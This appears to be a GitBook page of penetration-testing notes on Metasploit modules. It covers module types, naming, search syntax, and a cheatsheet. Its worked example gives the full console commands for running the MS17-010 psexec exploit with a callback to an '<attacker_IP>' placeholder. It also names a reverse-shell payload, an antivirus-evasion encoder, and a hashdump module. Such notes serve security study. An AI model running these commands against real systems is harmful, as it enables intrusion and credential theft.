Noirchapeau's Gitbook
Noirchapeau
Noirchapeau
  • Welcome to NoirChapeau Gitbook
  • Network Mapping and Security Auditing Tool
  • Footprinting - Enumeration and Information Gathering Notes
    • FTP Pentesting Notes
    • SMB Pentesting Notes
    • SSH Pentesting Notes
    • IPMI Pentesting Notes
    • Oracle TNS Pentesting Notes
    • MSSQL Pentesting Notes
    • MySQL Pentesting Notes
    • SNMP Pentesting Notes
    • IMAP/POP3 Pentesting Notes
    • SMTP Pentesting Notes
    • DNS Pentesting Notes
    • NFS Pentesting Notes
  • Web Reconnaissance Notes
  • Vulnerability Assessment Notes
    • Nessus Vulnerability Scanner Notes
    • OpenVAS (GVM) Vulnerability Scanner Notes
  • File Transfer Techniques for Pentesting
    • Advanced File Transfer Techniques
    • File Transfer Detection & Evasion Techniques
  • Shells & Payloads: Shell Overview
    • Shells & Payloads: Payloads Overview
    • Shells & Payloads: Web Shells Overview
    • Shells & Payloads: Detection & Prevention
  • Metasploit
    • Working with Metasploit Modules
    • Targets and Payloads
    • Encoders & Msfvenom: Advanced Exploitation Techniques
    • Database Management in Metasploit
    • Sessions and Jobs
    • Writing and Importing Custom Modules into Metasploit
    • Firewall and IDS/IPS Evasion
  • Password Attacks
    • Remote Password Attacks
    • Windows Local Password Attacks
    • Linux Local Password Attacks
    • Windows Lateral Movement
    • Files & Archives Cracking
    • Password Management
  • Interacting with Common Services
    • Protocol Specific Attacks
Powered by GitBook
On this page
  • Overview of Metasploit Modules
  • Types of Metasploit Modules
  • Module Structure
  • Searching for Modules
  • Using Modules: Practical Example
  • Command Cheatsheet
  1. Metasploit

Working with Metasploit Modules

Overview of Metasploit Modules

Metasploit's modules are pre-built scripts designed for specific tasks such as vulnerability scanning, exploitation, post-exploitation, and evasion. They are a cornerstone of the framework, enabling penetration testers to streamline their workflows and automate tasks.

Purpose of Modules:

  • Automate repetitive processes.

  • Enhance manual testing by providing reusable functionality.

  • Organize tools and exploits into categorized scripts.

Types of Metasploit Modules

  1. Auxiliary Modules:

    • Non-exploit modules for scanning, fuzzing, sniffing, and information gathering.

    • Example:

      auxiliary/scanner/smb/smb_version

  2. Encoders:

    • Modify payloads to bypass detection mechanisms like antivirus (AV).

    • Example:

      x86/shikata_ga_nai

  3. Exploits:

    • Exploit vulnerabilities in systems or applications.

    • Example:

      exploit/windows/smb/ms17_010_eternalblue

  4. NOPs (No-Operation):

    • Maintain payload stability by filling memory with NOP instructions.

    • Example:

      generic/nop

  5. Payloads:

    • Code delivered to the target, often used to establish remote access.

    • Example:

      windows/meterpreter/reverse_tcp

  6. Post-Exploitation Modules:

    • Perform tasks after gaining access, such as lateral movement or data extraction.

    • Example:

      post/windows/gather/hashdump

  7. Plugins:

    • Extend Metasploit's functionality with additional features.

    • Example:

      openvas

Module Structure

Modules are organized hierarchically based on their type, target OS, service, and functionality.

General Format:

<type>/<os>/<service>/<module_name>

Example:

exploit/windows/http/iis_webdav_scstoragepathfromurl

Components Explained:

  1. Type: Module category (e.g., exploit, auxiliary).

  2. Operating System: Target OS (e.g., windows, linux).

  3. Service: Vulnerable application or protocol (e.g., http, smb).

  4. Name: Descriptive identifier of the module.

Searching for Modules

Use the search command to locate modules based on specific criteria.

Syntax:

search [<options>] [<keywords>:<value>]

Examples:

  • Search for modules related to MS17-010:

    search ms17_010

  • Filter by CVE ID:

    search cve:2009 type:exploit

  • Exclude specific platforms (e.g., Linux):

    search platform:-linux

Search Options:

Option
Description

-h

Displays help for the search command.

-o <file>

Saves search results to a file.

-S <regex>

Applies a regex filter to results.

-s <column>

Sorts results by a specific column.

-r

Reverses the sort order.

Using Modules: Practical Example

Scenario: Exploiting MS17-010 using the EternalRomance module.

  1. Search for the Exploit:

    msf6 > search ms17_010

  2. Select the Module:

    msf6 > use exploit/windows/smb/ms17_010_psexec

  3. View Module Information:

    msf6 exploit(ms17_010_psexec) > info

  4. Configure Options:

    msf6 exploit(ms17_010_psexec) > options
msf6 exploit(ms17_010_psexec) > set RHOSTS <target_IP>
msf6 exploit(ms17_010_psexec) > set LHOST <attacker_IP>

  5. Execute the Exploit:

    msf6 exploit(ms17_010_psexec) > run

  6. Post-Exploitation:

    • After gaining access, use payload commands (e.g., Meterpreter) to perform further actions such as privilege escalation or credential harvesting.

Command Cheatsheet

Command
Description

search <keyword>

Locate modules matching the keyword.

use <module_path>

Load a module into the console.

info

Display detailed information about a module.

show options

List configurable parameters for a module.

set <option> <value>

Configure a specific option.

run or exploit

Execute the module.

show payloads

View payloads compatible with the module.

show targets

List targets supported by the module.

PreviousMetasploitNextTargets and Payloads